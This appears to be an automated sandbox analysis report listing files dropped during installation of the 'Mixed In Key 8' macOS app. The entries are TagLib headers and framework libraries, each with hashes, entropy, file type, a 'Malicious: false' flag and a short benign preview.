SHA-512:	EACB3C626B9F521E84FF46D810330C088B78947CB18F4DDA1199750C9EC6EE8638297B00795924C512C2F4CE2DB55F6916A01505FD420E4D84AAAC396DF7D4B4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...TwrmmkGoWNQCPfNrfri8fw/PKHQ=...</data>..</dict>..<key>files2</key>..<dict>...<key>Headers/MIKMIDI.h</key>...<dict>....<key>hash</key>....<data>....AkdZmPvJe13nHMk4attbgvbmUi8=....</data>....<key>hash2</key>....<data>....rtvs9hK4X4flU8FsG+E8Zb5+K4fZSywKXenDLUOBRwQ=....</data>...</dict>...<key>Headers/MIKMIDIChannelEvent.h</key>...<dict>....<key>hash</key>....<data>....q7JQdPYY6IEAd0PMgtmfUCfkQa4=....</data>....<key>hash2</key>....<data>....9dDmPXfHhOckRyoNukhHrpvfRGpt1fpvFKdQPW/l1SE=....</data>...</dict>...<key>Headers/MIKMIDIChannelPressureCommand.h</key>...<dict>....<key>hash</key>....<data>....RbXnH05V1ajJVEhDFox5/mnoqxw=....</data>....<key>hash2</key>....<data>....03Z/Ql9YdEi7sL0BroKanDuvT/PJgLujNSr1Auv6Mnw=....</data>...</dict>...<key>Headers/M

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/.BC.T_qhmt0Y Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|WEAK_DEFINES\|BINDS_TO_WEAK\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	675280
Entropy (8bit):	6.0160982216274
Encrypted:	false
SSDEEP:	6144:YFeYcYFYpmf0DpesPPxe6ht+o5UWQHCNhlLLeEO1zB7dOPkrJx+B:6tYxN7PPxeAt+o5yHulmJ1z3
MD5:	163DF8223155C4AB38E3D210944F08C9
SHA1:	7EE3B3A629506E4C3405094F33C88DBBBA918C3C
SHA-256:	F5072A82C7D2B7D4B5AE9728A76426FFDB8B1FAAC00E1745B73BA0F85A7CC2DB
SHA-512:	5CD576A6532C2CCC9C4B0E4796480CC0D6E3956A4C9CD4297C08B3E0102579869348384E223DB190AEDB59F5B4D53B284191B2DE810DE45E54D50ED2F5DD3126
Malicious:	false
Preview:	........................................__TEXT..........................................................__text..........__TEXT..................;.......................................__stubs.........__TEXT...........5......l........5..............................__stub_helper...__TEXT..........X<..............X<..............................__objc_methname.__TEXT...........G...............G..............................__cstring.......__TEXT...........u.......6.......u..............................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT........................................................__ustring.......__TEXT..........................................................__const.........__TEXT..........................................................__gcc_except_tab__TEXT..........p.......T/......p...............................__unwind_info...__TEXT..........................................................__eh_frame......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/.BC.T_mx7dic Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|WEAK_DEFINES\|BINDS_TO_WEAK\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	934272
Entropy (8bit):	6.1538518216777645
Encrypted:	false
SSDEEP:	6144:HRDNT7eO36ebSZ0ZibwlEAFaM8fCZzz7HS3DP+Et6ooRscoPGn/MB8GIDmuniLjg:7mmdZieEAFaM86ZzzO3T9o+P4DlniN
MD5:	A74579D680F6BBD3B416DC3964F6FB1D
SHA1:	C3CD4330D9378D66D8E7958D3539266BDE440C91
SHA-256:	89A6CF6CBA3D366EC096A392B53031BC4DABFABF141221257250F47607672AA4
SHA-512:	CFB538F8C9EED8DEFA8CF8B705145D8C4B25B13605C9CC0E2C6661F737E3220FA0279249F6A5D6D5F93BE6A764450B592740BE92B4B616CDC64648E781CB25E2
Malicious:	false
Preview:	........................................__TEXT...................@...............@......................__text..........__TEXT..................X;......................................__stubs.........__TEXT...........O...............O..............................__stub_helper...__TEXT..........`Q..............`Q..............................__gcc_except_tab__TEXT...........S...............S..............................__const.........__TEXT...........f......3=.......f..............................__cstring.......__TEXT.................Q?.....................................__unwind_info...__TEXT..........$........G......$...............................__eh_frame......__TEXT..........0..............0......................................__DATA...........@.......P.......@.......P......................__got...........__DATA...........@...............@..................A...........__nl_symbol_ptr.__DATA...........A...............A..................r...........__la_symbol_ptr.__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_0TGzIS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4017
Entropy (8bit):	4.239874887293045
Encrypted:	false
SSDEEP:	24:8SWHjN57bfy9lOkHYg/TbVI2+RymPOFesYjjHpsnUXD6+J60pbogz7plQQT2CaPB:KnTyBHbKjPOLQJDZlpboulHT2tKIA3W
MD5:	DB57AE4BCD3914FAB87CBDFCD516F7D5
SHA1:	F41830D9595063F5F207505E53CB9AECE9BF7E21
SHA-256:	11BABDCC9AC5901FF3555B63D3CD23F98D461B4038805001913FC88347B8D824
SHA-512:	684CE2EF057F3CFCCC4DBC480D74FAD2842DBA00B47653E0961F25A286B38DBA87EA52AD52BA132C81D998BF754B78328816CFE71E24F8BF3398D31CD19F39B6
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_16xsaC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3159
Entropy (8bit):	4.380666386249091
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOLMLvLd9K4RH23yu6g7K4HwYglxTJxwY0/sIldwe:kobcjhzRW3yNqUxfwY0xf
MD5:	1E77D001E9D2E28284642B05C7CB2282
SHA1:	89615A6963EE75BC9DD8931C583AC13BE2FAEC30
SHA-256:	0B933507E5B558E086B5D2D3BE5F6DF511E8BF0F50FF47CCC8D03035F7FE9803
SHA-512:	E2AA23041E4A5C463C270DDE6914A8C51E58B6E5378CE3372C29F10C77D98A19FDF16C4C239EA4171FB9763A996F37A8C2E10EB657DBF41D7BCC0B30B009B8C9
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1YpdZl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6273
Entropy (8bit):	4.5014784507988885
Encrypted:	false
SSDEEP:	192:LizipU5eBNmTTWfhkgQbROQsOrOE6Gzca48Vl/RBrZ9yP9yHHMQOIlVm6Im6whkO:Likf0dl4snkF1c
MD5:	C82977A47F2AEA0E92A9666024EFB167
SHA1:	9D415308299D7EE147E3363F434288951F4B633D
SHA-256:	D62DD95AE41AB958ACD0C77100E36A0AA8818291A86DC75068CD0923A5A70575
SHA-512:	A19C82FED37022A4E95A122B8131652CBCFDFFE6543FD369EAF263C8BB42C0FEEDF174C079A8F7B956B46BECA7E73CF7DF2713A658628E1A462A41AB58BEE0AF
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1bsNr0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	6244
Entropy (8bit):	4.2697355194636435
Encrypted:	false
SSDEEP:	192:KFQ+6JIP6JpjBXp1JqTkNPwcgg4aCeQey44ywAch8JhZiufN0/VLNERmcN7xHmah:KO1z
MD5:	7768AA251CE98FD94FB81E08F0ED05F5
SHA1:	D1491D849D1A9C4A29FD1B290D00846BAB9AE870
SHA-256:	AD1861F48BC0BBBCE36883EC0D2E2DE3C9500A71BF83801983447FC774BBCAE6
SHA-512:	D4631C8E97EEB6AC9921F51CE801ECDB45B8A52BCA58F51E9D73EB9908D9E0694A517C23CC9A0B34143B8DE5C74EFFF8B835847A269362DB575C68A30B459AC9
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2005-2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2XElWX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3052
Entropy (8bit):	4.337980761263327
Encrypted:	false
SSDEEP:	48:NlTyBHbKjPOLyEy8aIbkgwt1UD0z/owudqaTX9Hn:NAbDAIb1G1UDMQwSXt
MD5:	06A8A2F38E81963831167BDBAC72C6DC
SHA1:	5C9D89503F7AEBCE0CFF3C2B047A2EA29DB8EC95
SHA-256:	6350F759FE401032E10C6488CED557D22FD80C8416BA370FFC288B45A41C1BBC
SHA-512:	842DB741404C2EBB34621261755323739DC7D74D10227F296780419BF443915FD75E7AF1C655CBA58EE1AF015D8420AF6D2CF0C8252C27BE13919C86FD343C08
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2013 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2akWwI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	14815
Entropy (8bit):	4.377395583415838
Encrypted:	false
SSDEEP:	192:LKPPnoAxEo3VBbTcqSNrB0SpULbJOzbJM+zVlf0M8M9xMy9q9uj9q9F49q9BgoeM:LmAq3J8JMHfzprKoUJWn
MD5:	5076DF959415AEF20C1089B571194E01
SHA1:	4DACE95E456A9ECD53E90EC77C2ADBC37DEE2E95
SHA-256:	5F0133BB130C78FF52087F8C1977C2B16DABA18E4B1E5654CBD548C13D0B6E3A
SHA-512:	F922204DAAD64B3B440E675C7E7BE009B449FEEB8AC0D48B417DD5085A1A42EB2479E5A8A2C21C39BD554F029215E316A8D0E1735153726759906B752E58F337
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4QS7oY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5384
Entropy (8bit):	4.41046070959146
Encrypted:	false
SSDEEP:	96:/ybIFBfUOfvlUQLfaQ1sQthLHAeQCPy3QFQQFh6QB/aQXHvQXnJ+p3Q2VccmQUy0:64fUOfvyQLfaQ1sQzLHAeQCq3QFQah6p
MD5:	D02CB83424B4A392E5A5E503B418088A
SHA1:	C93ACAB6F146B4E5957D5E5F354B4BF996217AB0
SHA-256:	3E28246CB7FA97584DCE9351A48F1907BF2FBBA06F4612AEAFA3450DB9CD3635
SHA-512:	B799D1D997155DB985CB493DBEC48FA6E1C9889F775692DE320FC17F7902F2E7381EBA1DBDFB5539F30AAAF8CF0D7E6B19F46786EF82EAC984DFC91FF0DD692F
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Lukas Lalinsky. email : lalinsky@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4W3rGF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5055
Entropy (8bit):	4.233614223585261
Encrypted:	false
SSDEEP:	96:kobgCpd0UqtY+Xln6TL5gYlMV1+Zs92BVOuIeYA2di+9rYgun1quGInxrKNcV+24:LcCpd9qtYAuL5gYaV1+Zs92BVOuIeYAM
MD5:	7C45E49B5DEF21379FD065061FC0FD9F
SHA1:	9FB54B78E8DCEF634DE8A49E017F2EF11F51EEA8
SHA-256:	D0B08575045D091AD8D39B68EC3652B736AE8890CA0DE0FE5CED4C51E150C177
SHA-512:	6892F5946630501F4C0E0F4C62A5DB7A944083651B16ED6C4FD6937678947E5163F77426996C90CD4C830ECCCB10CBE4FA652D6FC6866B4A716F57AE9695B34E
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4fgIFD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6142
Entropy (8bit):	4.86951756844954
Encrypted:	false
SSDEEP:	96:02XrVyRKhG7gH+Iu87bPaXZ9WIrt1JSEghAGzZZNuSj0Js827fNSprH5Oyl0gTDh:02XQchd+Iu86XdppgW0zuSjl7F6blZ
MD5:	F318E6C96E7B62D7B1821CA9CF43F0CF
SHA1:	58B072DE5DECE03529D9E5A1F0CD9852EAA2661F
SHA-256:	1B8AC5B6306944D946C69E97ACBC54563D1C6A0CF7B774C5AB32AAB9AA0D6083
SHA-512:	345D3791219176D400068B5B3C6B60EF0643E63979650D7073D8A4641E328522C7B210BCC1B40964A65E8F0477845466F411EFAC0409C7C0312D07BA4EE72813
Malicious:	false
Preview:	#ifndef TAGLIB_UNICODE_H.#define TAGLIB_UNICODE_H../******************************************************************************. . THIS FILE IS INCLUDED IN TAGLIB, BUT IS NOT COPYRIGHTED BY THE TAGLIB . AUTHORS, NOT PART OF THE TAGLIB API AND COULD GO AWAY AT ANY POINT IN TIME. . AS SUCH IT SHOULD BE CONSIERED FOR INTERNAL USE ONLY. . . *****************************************************************************/..#ifndef DO_NOT_DOCUMENT // tell Doxygen not to document this header../. * Copyright 2001 Unicode, Inc.. * . * Disclaimer. * . * This source code is provided as is by Unicode, Inc. No claims are. * made as to fitness for any particular purpose. No warranties of any. * kind are expressed or implied. The recipient agrees to determine. * applicability of information provided. If

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4lJ4zG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	8240
Entropy (8bit):	4.257275090052181
Encrypted:	false
SSDEEP:	192:LDdOuwSIDyJl88OJ3kjVJ2m9EYBp4m9NFB83KTpqGe1NNcQC04qyJQphH3xQtaI:LUuw3RuVYmuYB+mxpqXxK
MD5:	9E290B3FD3CCA85F505BA036EE2F4447
SHA1:	BC7B2189507F3C144606A5960EC646CD35A2A893
SHA-256:	76CCAE7F8D7C166A773C87FD2EF2C4688F88F23CBB1E12C4A47AA26B87A9E9E1
SHA-512:	6F0C7947F39AAB1BF145230AFACDB782E3989565251B7BE01B43AEE36F0A83640320CDFBA5AE6D32C7705273AEE6865D3764F89DE4F2AA51F51B6CE54D8D71F1
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4pUbaz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4522
Entropy (8bit):	4.288665085440816
Encrypted:	false
SSDEEP:	48:KnTyBHbKjPOLePDQ4V8rTXiHmRCBMYXiFiZjW:Kyb0CrTSHmRCB3SgZa
MD5:	D04FD0F99759F5EF46A2489A18846601
SHA1:	0860B190EA7CE2821E990A06F57AE63570A90D10
SHA-256:	5ED7218BCCAC1DD30793968C65C18E950C8CFE4E7DD809E0B65F7BBDC0C09A11
SHA-512:	9F73012215E9AC270A3F32D7AD1B8B69E54592826985E4774821659E3104DE81C5844FBB82234225628011E66E802E6E3873C39FC0323928B05DA4E892DEC917
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4sfElD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7333
Entropy (8bit):	4.3829472365907085
Encrypted:	false
SSDEEP:	192:DMwWEs8XwER4C1xedFo+UJYOuaba6QbcM8zuOX+RW1bzWXz8uzNmFzg9ka2Wz7:DMWMz9sK
MD5:	4A65B644F88F6E54803EE0F280F4ACE7
SHA1:	F8A812640DC73363B37B1D9650C54EB70B16B2A7
SHA-256:	8340414A0897765CDE5B928DC3D91032A9401DEAAB84EBED7091B815CF7A59D8
SHA-512:	B8B385A5CFD7D8FB027A2FBC240A27EA4A96761D02EBE654C7BCB7C3DC757729AA56A007FF440AFE79D7F0E1DD49934F3800C0817125664870F985124653F9C3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2014 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_5AqXFQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5387
Entropy (8bit):	4.433251112125085
Encrypted:	false
SSDEEP:	96:kob3F891G0RoqsI0SModsqSNynebJdOObJpzJf1a8cCZaX3:Lxe1sVSqqSNynebJdOObJpzJf88tZ03
MD5:	852583E869F40233EF53DCFCF7311453
SHA1:	BCB9B380FC79A9A2D164C25E955C471B0A17A5BB
SHA-256:	B8ABF615AA954700BA9D3CD10742174BDC8EDC056E540FB188F0CA9A980F6FD8
SHA-512:	77F4387CD761ADA7D10469550BFA4C4B17D1137684FFBDF9EA921ED4278BD33F0FD7FE9C5F1DF4FEFE2BDEE05E449565437F8F66152946D4D25B4483EA4A3CA3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_5whTvd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4796
Entropy (8bit):	4.37930151960639
Encrypted:	false
SSDEEP:	96:/ybfpu/64ukIuM47YlUQ6ZfMqsILHAetPy30QQFh6+/a0vfOEppeyycMsIvitFrz:6w/JukIuM47YyQ6ZfMqsILHAetq30Qad
MD5:	90378EA4E7E3169C1FE8D90B3A21C202
SHA1:	F57EFCF2CC9AE08B20DC26717EF1DE9C54D79C03
SHA-256:	CD138C1FCB40A05181E979937F228CAF2264C395B978FC5AA5907E0931D82522
SHA-512:	C2B2D424FA60B06EFF71B76B60EF3113C23E6E3E2F47C9777CAD10231631CBA7A44184207AC2A35FF3535235B24E43DC3516BC221AD395FBD62F07618952957A
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Lukas Lalinsky. email : lalinsky@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_6LWHWt Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6659
Entropy (8bit):	4.4457204739322576
Encrypted:	false
SSDEEP:	192:Z72DANl+ll8ntxdavdfKvD2FCivMEKjJGsn8E:Zm8Ufp1nE
MD5:	E39FE2DBC78B028E96B9B2F297AF3A36
SHA1:	B14B46DA16FA835837DDBEFF1B9DDC60E9A6C375
SHA-256:	7061F104B5CD2F7DEB15ACDAAEA9F2AA55D8E41C3DDA1952515C2AC7A43800D1
SHA-512:	5DE31E0AC9DEC642F7A1C37AE7E56D7B12EF2ECB4D4A9366997F895C9E3ACFA31F993079BDD202AF43B1F68E8D0A80F7D8F4E42305945A936830A80D38ACAEC2
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_6XBUuq Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5209
Entropy (8bit):	4.235139754832094
Encrypted:	false
